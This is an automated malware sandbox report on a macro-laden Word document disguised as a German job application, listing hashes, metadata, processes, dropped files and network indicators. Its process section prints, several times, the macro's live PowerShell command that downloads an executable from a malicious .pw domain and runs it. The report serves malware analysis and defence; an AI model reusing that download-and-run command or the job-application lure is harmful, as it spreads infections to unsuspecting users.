analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sofia Kohl - Bewerbung.do_

Full analysis: https://app.any.run/tasks/80655ae4-0328-421e-9f46-7bf1219ac284
Verdict: Malicious activity
Analysis date: February 10, 2019, 20:53:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

ABD244239B80F1EB97E9700AB80431CA

SHA1:

1E6309E2192B89B201F2EF505CAC69C8B51D5F70

SHA256:

1F9D54A08BD8A407F7215D5246008189E9FD9DA061B89DF09A32079E6D4526E2

SSDEEP:

1536:TdKINA4+j2w7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJJJJJJJJC840H6La+:Bd+iwdLragb7JJJUJJJPjGFJJJJJJJJ8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2808)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2976)
      • cmd.exe (PID: 3776)
      • cmd.exe (PID: 3400)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2808)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2808)
    • Creates files in the user directory

      • powershell.exe (PID: 3732)
      • powershell.exe (PID: 3392)
      • powershell.exe (PID: 3744)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2808)
      • WINWORD.EXE (PID: 2856)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2808)
      • WINWORD.EXE (PID: 2856)
    • Reads settings of System Certificates

      • chrome.exe (PID: 2652)
    • Application launched itself

      • chrome.exe (PID: 2652)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: User
Subject: -
Title: -

XML

ModifyDate: 2018:12:07 10:22:00Z
CreateDate: 2018:12:07 10:18:00Z
RevisionNumber: 2
LastModifiedBy: User
Keywords: -
AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 1 minute
Template: santaclause

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1511
ZipCompressedSize: 404
ZipCRC: 0x23cbfb46
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
18
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs explorer.exe no specs winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2856"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Sofia Kohl - Bewerbung.do_.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3284"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2808"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2976cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','%temp%\xkbkagcm.exe');start %temp%\xkbkagcm.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3392powErshEll (New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe');start C:\Users\admin\AppData\Local\Temp\xkbkagcm.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3776cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','%temp%\xkbkagcm.exe');start %temp%\xkbkagcm.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3744powErshEll (New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe');start C:\Users\admin\AppData\Local\Temp\xkbkagcm.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3400cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','%temp%\xkbkagcm.exe');start %temp%\xkbkagcm.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3732powErshEll (New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe');start C:\Users\admin\AppData\Local\Temp\xkbkagcm.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2652"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
Total events
3 150
Read events
2 202
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
49
Text files
49
Unknown types
5

Dropped files

PID
Process
Filename
Type
2856WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8F94.tmp.cvr
MD5:
SHA256:
2856WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2BC72A48-70A6-4A29-9AD3-CCF2668974DF}.tmp
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCCE.tmp.cvr
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A8C1CE7.png
MD5:
SHA256:
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BKJDCZQS6N9B2AT8SD53.temp
MD5:
SHA256:
3744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WUVWOL44SMEMZIUDKUAS.temp
MD5:
SHA256:
3732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L9MCPWZW5XAM97LNVHSC.temp
MD5:
SHA256:
3732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1d36d2.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1c163f.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
16
DNS requests
13
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2652
chrome.exe
172.217.21.227:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2652
chrome.exe
172.217.23.131:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2652
chrome.exe
216.58.205.227:443
www.google.de
Google Inc.
US
whitelisted
2652
chrome.exe
216.58.207.74:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
2652
chrome.exe
172.217.21.206:443
apis.google.com
Google Inc.
US
whitelisted
2652
chrome.exe
216.58.207.68:443
www.google.com
Google Inc.
US
whitelisted
2652
chrome.exe
172.217.21.237:443
accounts.google.com
Google Inc.
US
whitelisted
172.217.22.74:443
fonts.googleapis.com
Google Inc.
US
whitelisted
2652
chrome.exe
172.217.18.3:443
www.google.dk
Google Inc.
US
whitelisted
2652
chrome.exe
172.217.22.46:443
ogs.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
tokotikotoko.pw
malicious
clientservices.googleapis.com
  • 172.217.21.227
whitelisted
www.google.de
  • 216.58.205.227
whitelisted
www.gstatic.com
  • 172.217.21.227
whitelisted
safebrowsing.googleapis.com
  • 216.58.207.74
whitelisted
accounts.google.com
  • 172.217.21.237
shared
ssl.gstatic.com
  • 172.217.23.131
whitelisted
apis.google.com
  • 172.217.21.206
whitelisted
www.google.com
  • 216.58.207.68
whitelisted
www.google.dk
  • 172.217.18.3
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.pw domain - Likely Hostile
No debug info